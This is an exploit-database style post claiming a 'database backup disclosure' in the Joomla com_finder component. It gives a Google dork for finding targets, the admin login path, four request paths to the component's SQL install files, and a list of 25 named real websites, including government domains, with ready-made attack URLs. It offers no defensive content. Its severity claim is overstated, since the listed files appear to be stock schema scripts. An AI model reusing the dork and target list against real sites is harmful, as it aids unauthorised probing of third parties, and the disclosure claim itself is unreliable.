Joomla Com_Finder 4.0.0 Database Disclosure

Joomla Com_Finder component version 4.0.0 suffers from a database disclosure vulnerability.


MD5 | 186354a6e3d9e945ec6f0d231330bbcf

#################################################################################################

# Exploit Title : Joomla Com_Finder Components 4.0.0 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 02/12/2018
# Vendor Homepage : joomla.org
# Software Download Links :
github.com/joomla/40-backend-template/tree/master/administrator/components/com_finder/sql
github.com/joomla/joomla-cms/archive/4.0.0-alpha1.zip
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Version Information : 4.0
# Google Dorks : inurl:''/administrator/components/com_finder/''
# CxSecurity Exploit Link : cxsecurity.com/issue/WLB-2018110189
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2259
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31521
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/administrator

# Exploit :

/administrator/components/com_finder/sql/install.mysql.sql

/administrator/components/com_finder/sql/install.postgresql.sql

/administrator/components/com_finder/sql/uninstall.mysql.sql

/administrator/components/com_finder/sql/uninstall.postgresql.sql

#################################################################################################

# Example Vulnerable Sites =>

[+] library.franklincountyva.gov/administrator/components/com_finder/sql/install.mysql.sql

[+] freightdb.kzntransport.gov.za/administrator/components/com_finder/sql/install.mysql.sql

[+] operaciavianocnedieta.sk/administrator/components/com_finder/sql/install.mysql.sql

[+] mvapower.com/MVASITE/administrator/components/com_finder/sql/install.mysql.sql

[+] kkn.cz/gdpr/administrator/components/com_finder/sql/install.mysql.sql

[+] labarjaque.com/administrator/components/com_finder/sql/install.mysql.sql

[+] elmwoodnebraska.com/nl/administrator/components/com_finder/sql/install.mysql.sql

[+] comesa.int/2016/administrator/components/com_finder/sql/install.mysql.sql

[+] xpilot-ai.org/administrator/components/com_finder/sql/install.mysql.sql

[+] pad.ribble-consultants.co.uk/joomla/administrator/components/com_finder/sql/install.mysql.sql

[+] njebertappraisals.com/administrator/components/com_finder/sql/install.mysql.sql

[+] villaalena.cz/administrator/components/com_finder/sql/install.mysql.sql

[+] cosemsmg.org.br/site/administrator/components/com_finder/sql/install.mysql.sql

[+] isleofwightdiscos.co.uk/administrator/components/com_finder/sql/install.mysql.sql

[+] tgr.org.hk/administrator/components/com_finder/sql/install.mysql.sql

[+] recursosvirtualesperu.com/joomla/administrator/components/com_finder/sql/install.mysql.sql

[+] asbsteel.com/site/administrator/components/com_finder/sql/install.mysql.sql

[+] brisbug.asn.au/administrator/components/com_finder/sql/install.mysql.sql

[+] djabugay.org.au/Joomla/administrator/components/com_finder/sql/install.mysql.sql

[+] stoneandequipment.com/panama/administrator/components/com_finder/sql/install.mysql.sql

[+] vente-ordi.com/administrator/components/com_finder/sql/install.mysql.sql

[+] huili.fi/administrator/components/com_finder/sql/install.mysql.sql

[+] jbyouth.net/joomla/administrator/components/com_finder/sql/install.mysql.sql

[+] bristolacneremoval.co.uk/administrator/components/com_finder/sql/install.mysql.sql

[+] utilsoluciones.com/en/administrator/components/com_finder/sql/install.mysql.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Related Posts